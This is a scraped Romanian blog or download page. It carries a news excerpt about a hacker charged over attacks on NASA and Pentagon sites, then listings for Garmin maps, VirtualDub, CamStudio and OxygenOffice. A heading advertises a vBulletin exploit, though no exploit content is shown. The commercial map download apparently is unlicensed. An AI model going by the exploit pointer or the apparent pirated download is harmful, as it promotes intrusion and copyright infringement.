Hackerul a procedat la postarea şi divulgarea respectivelor date informatice către public prin intermediul unui jurnal tip blog şi pe un site web.

"Prin acelaşi mod de operare, învinuitul a compromis şi server-ul web aparţinând National Aeronautics and Space Administration (NASA). În sarcina învinuitului se mai reţine că a accesat în mod neautorizat, lansând atacuri informatice asupra sistemului informatic şi paginii de web aparţinând Guvernului SUA, respectiv Departamentului de Apărare - Pentagon", spune sursa citată.

În acest scop, tânărul a conceput un program/aplicaţie informatică, pe care l-a şi oferit spre comercializare pe blog-ul personal, unde a postat şi o înregistrare video care a surprins atacurile informatice exercitate asupra site-ului oficial al administraţiei americane.

"Prin activitatea infracţională, s-a produs blocarea temporară a sistemelor informatice atacate, restricţionându-se astfel accesul la acestea şi perturbându-se în mod grav buna lor funcţionare", arată procurorii DIICOT, care subliniază că au colaborat în investigarea cazului cu autorităţile judiciare americane - FBI şi cu reprezentanţii NASA. 

 (Mediafax)

Read More

TinKode-vBulletin 4.x - 4.1.2 exploit

Read More

City Navigator® Europe NT 2012.30

Features

•Includes full country coverage for Western Europe and many countries in Eastern Europe as well as French Guiana and the islands of Malta, St. Barthélemy, Martinique, Guadeloupe and Réunion.
•Includes increased detailed coverage for Romania and Ukraine.
•Includes more than 10.2 million km (6.3 million mi) of roads, including motorways, national and regional thoroughfares and local roads, in Western Europe and many countries in Eastern Europe.
•Displays more than 4.9 million points of interest throughout the country, including restaurants, lodging, border crossings, attractions, petrol stations, campsites, shopping and more.
•Gives turn-by-turn directions on your compatible device.
•Enhances pronunciation for compatible devices that speak street names (example: "Turn right on Main Street").
•Includes navigational features, such as turn restrictions, roundabout guidance, speed categories and more.
•Contains traffic data for compatible devices that use traffic receivers.
•(DVD only) Includes computer software that lets you plan trips on your computer and transfer waypoints, routes and tracks between your computer and your device.


Coverage Details


Great Britain and Republic of Ireland
◦Great Britain: Full coverage
◦Scotland: Full coverage
◦Wales: Full coverage
◦Isle of Man: Full coverage
◦Northern Ireland: Full coverage
◦Ireland: Full coverage
◦Channel Islands: Full coverage
Denmark, Finland, Iceland, Norway, and Sweden
◦Denmark: Full coverage
◦Finland: Full coverage
◦Iceland: Full coverage
◦Norway: Full coverage
◦Sweden: Full coverage
France and Benelux
◦Andorra: Full coverage
◦Belgium: Full coverage
◦France: Full coverage
◦French Guiana: Coverage for most urban areas
◦Guadeloupe: Coverage for most urban areas
◦Martinique: Coverage for most urban areas
◦Netherlands: Full coverage
◦Luxembourg: Full coverage
◦Réunion: Coverage for most urban areas
◦Saint Barthélemy: Full Coverage
Italy, Austria, Switzerland, and Liechtenstein
◦Italy: Full coverage
◦Austria: Full coverage
◦Switzerland: Full coverage
◦Liechtenstein: Full coverage
Malta
◦Malta: Full coverage
Spain and Portugal
◦Spain: Full coverage
◦Portugal: Full coverage
◦Gibraltar: Full coverage
◦Azores Islands: Full coverage
◦Canary Islands: Full coverage
◦Baleric Islands: Full coverage
◦Madeira: Full coverage
Germany
◦Germany: Full coverage
Czech Republic
◦Czech Republic: Full coverage
Greece
◦Greece: Full coverage
Eastern Europe
◦Estonia: Full coverage
◦Latvia: Full coverage
◦Lithuania: Full coverage
◦Poland: Full coverage
◦Slovakia: Full coverage
◦Hungary: Full coverage
◦Slovenia: Full coverage
◦Croatia: Full coverage
◦Bulgaria: Full coverage
◦Romania: Coverage for most urban areas
◦Turkey: Full coverage
◦Moldova: Major roads only
◦Bosnia & Herzegovina: Major roads only
◦Serbia & Kosovo: Full Coverage
◦Montenegro: Coverage for most urban areas
◦Albania: Major roads only
◦Republic of Macedonia (FYROM): Coverage for most urban areas
◦Belarus: Major roads only
◦Ukraine: Coverage for most urban areas

Compatible Devices

aera® 500  aera® 510  aera® 550  aera® 560  Astro® 220  Astro® 320  Colorado® 300  Colorado® 400c  Colorado® 400i  Colorado® 400t  dēzl™ 560LMT  dēzl™ 560LT  Dakota® 10  Dakota® 20  Edge® 605  Edge® 705  Edge® 800  eTrex Legend® Cx  eTrex Legend® HCx  eTrex Venture® Cx  eTrex Vista® Cx  eTrex Vista® HCx  eTrex® 20  eTrex® 30  G60  GPSMAP® 60CSx  GPSMAP® 60Cx  GPSMAP® 62  GPSMAP® 620  GPSMAP® 62s  GPSMAP® 62sc  GPSMAP® 62st  GPSMAP® 62stc  GPSMAP® 640  GPSMAP® 76CSx  GPSMAP® 76Cx  GPSMAP® 78  GPSMAP® 78s  GPSMAP® 78sc  LIVE 1695  Montana™ 600  Montana™ 650  Montana™ 650t  nüvi® 1100  nüvi® 1100LM  nüvi® 1200  nüvi® 1250  nüvi® 1260T  nüvi® 1300  nüvi® 1300LM  nüvi® 1350  nüvi® 1350LMT  nüvi® 1350T  nüvi® 1360  nüvi® 1370T  nüvi® 1390LMT  nüvi® 1390T  nüvi® 1450  nüvi® 1450LM  nüvi® 1450LMT  nüvi® 1450T  nüvi® 1490LMT  nüvi® 1490T  nüvi® 1690  nüvi® 200  nüvi® 200W  nüvi® 205  nüvi® 205W  nüvi® 2200  nüvi® 2250  nüvi® 2250LT  nüvi® 2300  nüvi® 2300LM  nüvi® 2350  nüvi® 2350LMT  nüvi® 2350LT  nüvi® 2360LMT  nüvi® 2360LT  nüvi® 2370LT  nüvi® 2450  nüvi® 2450LM  nüvi® 2455LMT  nüvi® 2455LT  nüvi® 2460LMT  nüvi® 2460LT  nüvi® 2475LT  nüvi® 2495LMT  nüvi® 250  nüvi® 250W  nüvi® 255  nüvi® 2555LMT  nüvi® 2555LT  nüvi® 255W  nüvi® 2595LMT  nüvi® 260  nüvi® 260W  nüvi® 265T  nüvi® 265WT  nüvi® 270  nüvi® 275T  nüvi® 285WT  nüvi® 295W  nüvi® 30  nüvi® 3450  nüvi® 3450LM  nüvi® 3490LMT  nüvi® 3550LM  nüvi® 3590LMT  nüvi® 3750  nüvi® 3760LMT  nüvi® 3760T  nüvi® 3790LMT  nüvi® 3790T  nüvi® 40  nüvi® 40LM  nüvi® 465LMT  nüvi® 465T  nüvi® 50  nüvi® 500  nüvi® 50LM  nüvi® 550  nüvi® 750  nüvi® 755T  nüvi® 760  nüvi® 765T  nüvi® 770  nüvi® 775T  nüvi® 780  nüvi® 785T  nüvi® 850  nüvi® 855  nüvi® 880  nüvi® 885T  Oregon® 200  Oregon® 300  Oregon® 400c  Oregon® 400i  Oregon® 400t  Oregon® 450  Oregon® 450t  Oregon® 550  Oregon® 550t  Rino® 520HCx  Rino® 530HCx  Rino® 610  Rino® 650  Rino® 655t  StreetPilot® 7200  StreetPilot® 7500  zūmo® 220  zūmo® 450  zūmo® 550  zūmo® 660  zūmo® 665

Download City Navigator Europe NT 2012.30

Read More

VirtualDub

Download VirtualDub-1.9.11.zip (x86 / 32-bit)
Download VirtualDub-1.9.11-AMD64.zip (x64 / 64-bit)


VirtualDub filters
VirtualDub filters can be loaded manually by clicking on the Load button that appears in the Add Filters dialog box.  They can also be automatically loaded at startup if you copy the .vdf file into aplugins subdirectory under the VirtualDub program directory.  It is possible, although unusual, for filters to conflict with each other, so if you have problems with a particular filter chain you might want to try testing each filter individually to narrow the scope of the problem.
Download subtitler-2_4.zip
Description: Applies Sub Station Alpha v2.x/4.x scripts to video.
Pretty self-explanatory; handles most of the common features in SSA scripts.  It has text antialiasing, so your subtitles look good at small sizes.
Download warpsharp-1_2.zip
Description: Sharpens images by warping pixels toward edges.

Sharpens images through warping rather than convolution.  Most effective on cartoon-style animation.

Note: This filter won't work in Avisynth because it uses the BitBlt() function from VirtualDub -- Donald Graft has a version on his site which will work.

What is VirtualDub?

VirtualDub is a video capture/processing utility for 32-bit and 64-bit Windows platforms (98/ME/NT4/2000/XP/Vista/7), licensed under the GNU General Public License (GPL).  It lacks the editing power of a general-purpose editor such as Adobe Premiere, but is streamlined for fast linear operations over video.  It has batch-processing capabilities for processing large numbers of files and can be extended with third-party video filters.  VirtualDub is mainly geared toward processing AVI files, although it can read (not write) MPEG-1 and also handle sets of BMP images.
I basically started VirtualDub in college to do some quick capture-and-encoding that I wanted done; from there it's basically grown into a more general utility that can trim and clean up video before exporting to tape or processing with another program.  I released it on the web and others found it useful, so I've been tinkering around with its code ever since.

Read More

CamStudio

Download Camstudio2-0.exe
Download Camstudio2-0-w32.zip
Download CamStudioCodec-1.4-w32.zip
(To manually install the codec, download the zipfile version, extract the contents to a folder, right click the camcodec.inf file and select Install.)
Download CamStudio_Setup_v2.6b_r294.exe

What is it?

CamStudio is able to record all screen and audio activity on your computer and create industry-standard AVI video files and using its built-in SWF Producer can turn those AVIs into lean, mean, bandwidth-friendly Streaming Flash videos (SWFs)
Here are just a few ways you can use this software:

• You can use it to create demonstration videos for any software program
• Or how about creating a set of videos answering your most frequently asked questions?
• You can create video tutorials for school or college class
• You can use it to record a recurring problem with your computer so you can show technical support people
• You can use it to create video-based information products you can sell
• You can even use it to record new tricks and techniques you discover on your favourite software program, before you forget them

Don't like the sound of your voice? No problem.

CamStudio can also add high-quality, anti-aliased (no jagged edges) screen captions to your recordings in seconds and with the unique Video Annotation feature you can even personalise your videos by including a webcam movie of yourself "picture-in-picture" over your desktop.
And if all that wasn't enough, CamStudio also comes with its own Lossless Codec that produces crystal clear results with a much smaller filesize compared with other more popular codecs, like Microsoft Video 1.
You have total control over the output of your video: you can choose to use custom cursors, to record the whole screen or just a section of it and can reduce or increase the quality of the recording depending on if you want smaller videos (for emailing to people, for instance) or you can have "best quality" ones for burning onto CD/DVD.
But all of these features would be worthless if CamStudio wasn't easy to use ... fortunately that's not the case. CamStudio can be learned in a matter of minutes and comes with a comprehensive built-in helpfile, so if you do manage to get stuck, you can simply hit "Help" and get the answers you need.

So where can I get it and how much does it cost?

You can download and use it completely free - yep - completely 100% free for your personal and commercial projects as CamStudio and the Codec are released under the GPL.

Read More

OxygenOffice Professional - Office Suite

Download OxygenOffice Professional - Office Suite

OOo_3.2.1_Win_x86_install_en-US.exe

Description

OxygenOffice Professional(OOOP, O2OP)is an enhanced version of free OpenOffice.org what is a multi-platform office productivity suite.OxygenOffice Professional contains more extras like templates, cliparts, samples, fonts and VBA support.

Features

• Full featured office suite application
• Fully compatible with OpenOffice.org - the leader free office suite
• Maintains high level of compatibility with Microsoft Office
• Contains exclusive clipart and template pack
• Avavilable for all major languages
• Special options and enhancements
• Based on ooo-build system to deliver OpenOffice.org compatible solution
• Runs fine on Windows 32 bit also on Linux 32 bit and 64 bit versions
• Enhanced SVG inport capabilities
• Works, WordPerfect WPG, Lotus Word Pro import
• Integrated WatchWindow
• Gstreamer multimedia integration for Linux operating systems
• 3D Impress effects for Linux
• Handles one million row in Calc

Read More